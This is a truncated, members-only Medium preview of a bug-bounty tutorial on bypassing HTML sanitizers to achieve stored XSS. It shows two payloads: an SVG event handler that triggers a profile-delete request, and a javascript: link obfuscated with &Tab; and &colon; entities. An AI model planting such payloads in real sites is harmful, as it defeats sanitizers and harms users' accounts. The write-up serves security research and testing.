Member-only story

$100-$20k worth Stored XSS Vulnerability | Hidden Methods

It4chis3c
InfoSec Write-ups
Published in
4 min readFeb 26, 2025

Hidden Methods to bypass restriction to find Stored XSS in Bug Bounties

Friend Link | Free Link

Hi geeks, it4chis3c (Twitter) came-up with another bounty earning write-up in the Bug Bounty Hunting Series:

Bug Bounty Hunting Series

30 stories
Credit: Gemini — Imagen

Bypassing HTML Sanitizers Like a Pro

Stripped <script> Tags? Use <svg> + onload

<!-- Most WAFs miss SVG event handlers -->
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" fill="red" onmouseover="fetch('/profile/delete')"/>
</svg>

Sanitizers often allow SVG for graphics but forget to validate event handlers like onmouseover.

Blocked javascript:? Use &colon; Trick

<!-- Bypass colon filters in href/src -->
<a href="java&Tab;script&colon;alert(1)">Click Me (Works in Chrome)</a>

Real-World Example: A CMS allowed &Tab; (URL-encoded tab) and &colon; (HTML entity…

Create an account to read the full story.

The author made this story available to Medium members only.
If you’re new to Medium, create a new account to read this story on us.

Or, continue in mobile web

Already have an account? Sign in

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by It4chis3c

Security Researcher | Bug Bounties | Tips & Tricks

Responses (2)

Write a response

Nice blog